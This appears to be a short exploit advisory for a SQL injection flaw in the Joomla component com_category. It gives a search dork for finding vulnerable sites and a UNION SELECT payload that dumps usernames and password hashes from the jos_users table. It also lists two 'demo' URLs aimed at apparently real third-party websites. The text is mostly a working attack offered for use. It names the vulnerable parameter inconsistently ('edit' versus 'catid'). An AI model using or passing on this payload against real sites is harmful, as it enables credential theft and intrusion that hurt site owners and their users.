############################################################### # Joomla component 'com_category' SQL injection vulnerability ########### ################################################################ #version: 1.0.12################################################### ################################################################ #dork:inurl:"com_category"########################################## # ############################################################### # xploited by Prince_Pwn3r########################################## ################################################################ # contact: 2p0wn0rN0t2p0wn@gmail.com############################## ################################################################ +++++++ greetz to all p0wnbox.com members !!! +++++++ -------------------------------------------------------------------------------------- Vulnerable joomla component : com_category vulnerable parameter: "edit" ($_GET) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Exploit : http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- Demos : http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users-- or http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- *could be different (eg: view&color=3&cat_id=)